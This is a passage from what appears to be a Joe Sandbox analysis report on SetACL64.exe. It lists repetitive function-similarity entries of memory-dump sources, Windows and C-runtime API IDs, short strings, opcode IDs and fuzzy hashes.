                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo$_get_daylight
                              • String ID:
                              • API String ID: 72036449-0
                              • Opcode ID: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
                              • Instruction ID: 2538cee995c2d87586fc08370d46db8c80fe6d9f3d18659bb3400b82d7405e30
                              • Opcode Fuzzy Hash: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
                              • Instruction Fuzzy Hash: 0E51E7B2E0C61342FBB54F28951537EA990EFA07D4F1944B5EA4DC72D5EE3DE8408B42
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CloseHandle$_invalid_parameter_noinfo_noreturn
                              • String ID:
                              • API String ID: 2401491561-0
                              • Opcode ID: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
                              • Instruction ID: fd5db7550af42a6f49f5a6aecaf680814d1a58a4b4c0eb36904deee74de60a9a
                              • Opcode Fuzzy Hash: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
                              • Instruction Fuzzy Hash: 19313BE5B19A4681FE648B25E8952382362FF98FD4F8849B1CA5DC77A5DF6CB5808200
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Event$MutexObjectReleaseResetSingleWait
                              • String ID:
                              • API String ID: 2375943032-0
                              • Opcode ID: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
                              • Instruction ID: bcc9a5fd2e6ffa2f413793952cac8e565487a2c92260a59148ceb6e02809006b
                              • Opcode Fuzzy Hash: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
                              • Instruction Fuzzy Hash: 8E01C872605B8581EB648F21E89432D73A4FBA8F98F548175DA5DC73A4EF38D895C340
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID: -log
                              • API String ID: 0-56760616
                              • Opcode ID: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
                              • Instruction ID: 20a4afc171a4e60f9475d09f3e0fc007733d402e8263013cbd754049dc188e53
                              • Opcode Fuzzy Hash: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
                              • Instruction Fuzzy Hash: 9F919CB2B15E4299EB24CBA5D4406AC23B1FB49BE8F404676CE1DD7BD8EE38E445C340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: *
                              • API String ID: 3215553584-163128923
                              • Opcode ID: 6066750e8e38b2fbd27d1c04c52ba2ad67439ad4c10818e761ddec3964bdc898
                              • Instruction ID: dbc6f760070934088d9476929200fd74f023c25fe264ca86bc2bad9774cd2dbd
                              • Opcode Fuzzy Hash: 6066750e8e38b2fbd27d1c04c52ba2ad67439ad4c10818e761ddec3964bdc898
                              • Instruction Fuzzy Hash: B17196F2D0921286E7B89F29885517D3BA0FB05F98F1401BEDA4EC6298FF38D881D754
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: __except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 1467352782-3733052814
                              • Opcode ID: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
                              • Instruction ID: cedda10396c1e5fec382d32b71f15af72770cb18fd6f71212e80e87a3fe38237
                              • Opcode Fuzzy Hash: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
                              • Instruction Fuzzy Hash: 16718EB2A0868186DB708B25D89077DBBE1EB81FC9F1491B6DE8DC7B85DE2CD491C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: EncodePointer
                              • String ID: MOC$RCC
                              • API String ID: 2118026453-2084237596
                              • Opcode ID: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
                              • Instruction ID: 9be6303af197e595ee73bd674d702da7383c30f459be4d798920fad58767f57f
                              • Opcode Fuzzy Hash: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
                              • Instruction Fuzzy Hash: 785149B2A08A85CAEB208F65D8403AD77A0FB44BC8F544265EF8ED7B59DF38E555C700
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID: ?\UNC\$\\?
                              • API String ID: 0-2035776247
                              • Opcode ID: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
                              • Instruction ID: 5daa1228fd8084f54e9de3f2a46ceac8b44dd487cd721f06daa1ced37866399e
                              • Opcode Fuzzy Hash: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
                              • Instruction Fuzzy Hash: 8C41CDE2F18A6681EE209B61C4643BD3361EB147D8F904272EA4DD3BC5EE6C92C0C244
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                              • String ID: tss
                              • API String ID: 73155330-1638339373
                              • Opcode ID: 7b158194c5e526a4a18f9fad0e2b90092b2974379bf3b45cd8f3baac7b0ba31a
                              • Instruction ID: 96ffc329d5cbe72a17d3959ad0c42b338135958fd9d80b5ae4102a20b6bf837a
                              • Opcode Fuzzy Hash: 7b158194c5e526a4a18f9fad0e2b90092b2974379bf3b45cd8f3baac7b0ba31a
                              • Instruction Fuzzy Hash: 7841EDA2B09A4285EE24DB62984417D62A0EB64BE0F580671EF2DC7BD5EF7CE4919304
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CreateFrameInfo__except_validate_context_record
                              • String ID: csm
                              • API String ID: 2558813199-1018135373
                              • Opcode ID: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
                              • Instruction ID: 0e17a8a05c4ca99439611c2f8d91af93658ad1ac4937e55757a470566f65c201
                              • Opcode Fuzzy Hash: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
                              • Instruction Fuzzy Hash: 2B515BB2A1874186E670EF25E8406AE77A4FB88BD1F101174EB8DC7B56DF38E460CB41
                              APIs
                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF69708297E
                                • Part of subcall function 00007FF697085054: HeapFree.KERNEL32(?,?,00007FF6970834C7,00007FF697084ADC,?,?,?,00007FF697084E5F,?,?,0000B6CF377E791F,00007FF697085874,?,?,?,00007FF6970857A7), ref: 00007FF69708506A
                                • Part of subcall function 00007FF697085054: GetLastError.KERNEL32(?,?,00007FF6970834C7,00007FF697084ADC,?,?,?,00007FF697084E5F,?,?,0000B6CF377E791F,00007FF697085874,?,?,?,00007FF6970857A7), ref: 00007FF69708507C
                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69707226D), ref: 00007FF69708299C
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe, xrefs: 00007FF69708298A
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                              • String ID: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
                              • API String ID: 3580290477-2931876395
                              • Opcode ID: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
                              • Instruction ID: f8489bae33473be02e6dce7704c9429af67f19ea06e9c919b099135a65d4b11f
                              • Opcode Fuzzy Hash: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
                              • Instruction Fuzzy Hash: E0416CB6A08A1286EB34DF2598810FD27A5FF44BE4F444075EA4ECBB85DE3EE451C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorFileLastWrite
                              • String ID: U
                              • API String ID: 442123175-4171548499
                              • Opcode ID: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
                              • Instruction ID: 79b59f054105815cbd65f2622334bcc9f117e9ea8a5f6ac9e3d7ac7bea1c444b
                              • Opcode Fuzzy Hash: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
                              • Instruction Fuzzy Hash: AF41A0A2B19A8182EB60CF65E8443AA77A1FB98BD4F544031EE4DC7798EF7DD441C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _handle_errorf
                              • String ID: "$powf
                              • API String ID: 2315412904-603753351
                              • Opcode ID: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
                              • Instruction ID: 027a7402fc733a45835b210df6a1efc3f1831621ff0727114441475f7591063c
                              • Opcode Fuzzy Hash: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
                              • Instruction Fuzzy Hash: 164153B3D18680DAD370CF21E4847AAB7A0F799388F101325F74981994DF7DC5509F44
                              APIs
                                • Part of subcall function 00007FF69708DE6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69708DE8E
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706E2EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_invalid_parameter_noinfo_noreturn
                              • String ID: rt, ccs=UNICODE$wt, ccs=UNICODE
                              • API String ID: 1705651295-2937027470
                              • Opcode ID: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
                              • Instruction ID: 8c74bcc5aa03289aa07e6cfc9237ffca8c7c18263818f8108e16a108f71ddf51
                              • Opcode Fuzzy Hash: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
                              • Instruction Fuzzy Hash: 2131C6B2A18B4282EA70DB19E49422D77A2FB88BD4F500275E79DC7795DF3CE690C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _handle_error
                              • String ID: "$pow
                              • API String ID: 1757819995-713443511
                              • Opcode ID: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
                              • Instruction ID: bb4985c548362bf0d9940593cd0a4d6f8484ae2f3e284a0f63622c0b43b083ae
                              • Opcode Fuzzy Hash: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
                              • Instruction Fuzzy Hash: D03122B2D1CA8586D770CF14E4447AABAB0FBDA388F201326F78996954DF7DD1459B00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: FormatFreeLocalMessage
                              • String ID: asio.system error
                              • API String ID: 1427518018-3828095645
                              • Opcode ID: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
                              • Instruction ID: 1c6c5f8e7e13236475145994a892876a98e4d2318c6dce13b5cbe1f9ad3483e5
                              • Opcode Fuzzy Hash: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
                              • Instruction Fuzzy Hash: A12191B2A08B9182F7258F15E58032A7BA6F751BE0F444275DB9983BD5DF7CD0A1CB40
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CloseHandleLocalTime
                              • String ID: %04d-%02d-%02d %02d-%02d-%02d-%03d
                              • API String ID: 655981579-2017722003
                              • Opcode ID: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
                              • Instruction ID: dc35007935734b7a0326f008ec2197793a12287e82d476bd0982dc83fd116686
                              • Opcode Fuzzy Hash: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
                              • Instruction Fuzzy Hash: 5A31D832A14B81D9E7208F71E8807DC3BB4FB4479CF205128EE8967B28DF3892A5D344
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _set_errno_from_matherr
                              • String ID: exp
                              • API String ID: 1187470696-113136155
                              • Opcode ID: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
                              • Instruction ID: 8b0761a452add81a84e63a3272a7b93d8ceb5ff3a64c708acf4d2c173a7b8847
                              • Opcode Fuzzy Hash: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
                              • Instruction Fuzzy Hash: 4E211DB6A1D6858BD770DF28A4412AAB3A0FB89380F505575F69DC2B59EF3DE4009F00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Stringtry_get_function
                              • String ID: LCMapStringEx
                              • API String ID: 2588686239-3893581201
                              • Opcode ID: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
                              • Instruction ID: 53c9c7c12e6e4dd2bd7ba04a88be66d90acb940e9b2c8b86f47aecaec7c4dd35
                              • Opcode Fuzzy Hash: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
                              • Instruction Fuzzy Hash: 3011F776A08B8186DB64CB56B4402AAB7A5FBC9BD0F54417AEA8DC3B59DF3CD4408B40
                              APIs
                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF697071032), ref: 00007FF697074C5C
                              • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF697071032), ref: 00007FF697074CA2
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ExceptionFileHeaderRaise
                              • String ID: csm
                              • API String ID: 2573137834-1018135373
                              • Opcode ID: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
                              • Instruction ID: 097ac2ed5d0ebb0a58db8aa2dbc7ccc1d9ad7c096ccf9affbb3707136346339b
                              • Opcode Fuzzy Hash: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
                              • Instruction Fuzzy Hash: 25114F72618B4582EB618F15E84026DB7E1FB98BD4F584270EE8D87B64DF3CD551CB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
